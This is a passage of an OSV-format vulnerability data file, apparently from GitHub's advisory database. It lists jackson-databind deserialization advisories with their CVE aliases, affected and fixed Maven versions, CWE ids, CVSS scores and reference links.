"https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0877" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1797" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-645p-88qh-w398" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/106601" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:17:52Z", "nvd_published_at": 
"2019-01-02T18:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6fpp-rgj9-8rwc", "published": "2019-08-01T19:18:00Z", "modified": "2024-03-15T05:18:54.134884Z", "aliases": [ "CVE-2019-14379" ], "summary": "Deserialization of untrusted data in FasterXML jackson-databind", "details": "SubTypeValidator.java in FasterXML jackson-databind before 2.9.9.2, 2.8.11.4, and 2.7.9.6 mishandles default typing when ehcache is used (because of net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup), leading to remote code execution.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.9.2" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/08/GHSA-6fpp-rgj9-8rwc/GHSA-6fpp-rgj9-8rwc.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.4" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/08/GHSA-6fpp-rgj9-8rwc/GHSA-6fpp-rgj9-8rwc.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": 
"pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.9.6" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/08/GHSA-6fpp-rgj9-8rwc/GHSA-6fpp-rgj9-8rwc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14379" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2387" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/ad418eeb974e357f2797aef64aa0e3ffaaa6125b" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f17f63b0f8a57e4a5759e01d25cffc0548f0b61ff5c6bfd704ad2f2a@%3Ccommits.ambari.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ee0a051428d2c719acfa297d0854a189ea5e284ef3ed491fa672f4be@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e25e734c315f70d8876a846926cfe3bfa1a4888044f146e844caf72f@%3Ccommits.ambari.apache.org%3E" }, { "type": 
"WEB", "url": "https://lists.apache.org/thread.html/d161ff3d59c5a8213400dd6afb1cce1fac4f687c32d1e0c0bfbfaa2d@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/99944f86abefde389da9b4040ea2327c6aa0b53a2ff9352bd4cfec17@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/940b4c3fef002461b89a050935337056d4a036a65ef68e0bbd4621ef@%3Cdev.struts.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/87e46591de8925f719664a845572d184027258c5a7af0a471b53c77b@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8723b52c2544e6cb804bc8a36622c584acd1bd6c53f2b6034c9fea54@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/859815b2e9f1575acbb2b260b73861c16ca49bca627fa0c46419051f@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/75f482fdc84abe6d0c8f438a76437c335a7bbeb5cddd4d70b4bc0cbf@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/689c6bcc6c7612eee71e453a115a4c8581e7b718537025d4b265783d@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6788e4c991f75b89d290ad06b463fcd30bcae99fee610345a35b7bc6@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:2824" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00011.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UKUALE2TUCKEKOHE2D342PQXN4MWCSLC" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190814-0001" }, { "type": "WEB", "url": "https://support.apple.com/kb/HT213189" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2743" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2935" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2936" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2937" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2938" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2998" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3044" }, { 
"type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3045" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3046" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3050" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3200" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3292" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3297" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3901" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0727" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0d4b630d9ee724aee50703397d9d1afa2b2befc9395ba7797d0ccea9@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0fcef7321095ce0bc597d468d150cff3d647f4cb3aef3bd4d20e1c69@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2766188be238a446a250ef76801037d452979152d85bce5e46805815@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2d2a76440becb610b9a9cb49b15eac3934b02c2dbcaacde1000353e4@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/34717424b4d08b74f65c09a083d6dd1cb0763f37a15d6de135998c1d@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/525bcf949a4b0da87a375cbad2680b8beccde749522f24c49befe7fb@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/56c8042873595b8c863054c7bfccab4bf2c01c6f5abedae249d914b9@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5ecc333113b139429f4f05000d4aa2886974d4df3269c1dd990bb319@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5fc0e16b7af2590bf1e97c76c136291c4fdb244ee63c65c485c9a7a1@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2022/Mar/23" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-915" ], "github_reviewed": true, "github_reviewed_at": "2019-08-01T15:38:02Z", "nvd_published_at": "2019-07-29T12:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6wqp-v4v6-c87c", "published": "2020-06-15T18:44:51Z", "modified": "2024-03-11T05:21:31.707912Z", "aliases": [ "CVE-2018-12023" ], "summary": "Deserialization of Untrusted Data", "details": "An issue was discovered in FasterXML jackson-databind prior to 2.7.9.4, 2.8.11.2, and 2.9.6. 
When Default Typing is enabled (either globally or for a specific property), the service has the Oracle JDBC jar in the classpath, and an attacker can provide an LDAP service to access, it is possible to make the service execute a malicious payload.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.4" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6wqp-v4v6-c87c/GHSA-6wqp-v4v6-c87c.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.2" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6wqp-v4v6-c87c/GHSA-6wqp-v4v6-c87c.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.6" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6wqp-v4v6-c87c/GHSA-6wqp-v4v6-c87c.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12023" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2058" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/bf261d404c2f79fd3406237710d40ebb03c99d84" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/7fcf88aff0d1deaa5c3c7be8d58c05ad7ad5da94b59065d8e7c50c5d@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZEDLDUYBSTDY4GWDBUXGJNS2RFYTFVRC" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { 
"type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0877" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1106" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1107" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1108" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1797" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": 
"http://www.securityfocus.com/bid/105659" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-11T21:43:23Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-758m-v56v-grj4", "published": "2020-04-23T21:36:03Z", "modified": "2024-06-25T14:20:03.301633Z", "aliases": [ "CVE-2020-10969" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-758m-v56v-grj4/GHSA-758m-v56v-grj4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10969" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2642" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/6ba48457984943df0de92c54144f7dcae01b1221" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "type": "WEB", 
"url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200403-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-23T19:28:10Z", "nvd_published_at": "2020-03-26T13:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-85cw-hj65-qqv9", "published": "2019-09-23T18:33:45Z", "modified": "2024-03-15T05:20:15.574552Z", "aliases": [ "CVE-2019-16335" ], "summary": "Polymorphic Typing issue in FasterXML jackson-databind", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10, 2.8.11.5, and 2.6.7.3. It is related to com.zaxxer.hikari.HikariDataSource. 
This is a different vulnerability than CVE-2019-14540.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/09/GHSA-85cw-hj65-qqv9/GHSA-85cw-hj65-qqv9.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/09/GHSA-85cw-hj65-qqv9/GHSA-85cw-hj65-qqv9.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", 
"2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/09/GHSA-85cw-hj65-qqv9/GHSA-85cw-hj65-qqv9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16335" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2449" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3200" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00001.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q7CANA7KV53JROZDX5Z5P26UG5VN2K43" }, { "type": "WEB", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TH5VFUN4P7CCIP7KSEXYA5MUTFCUDUJT" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Oct/6" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20191004-0002" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4542" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0159" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0160" }, { 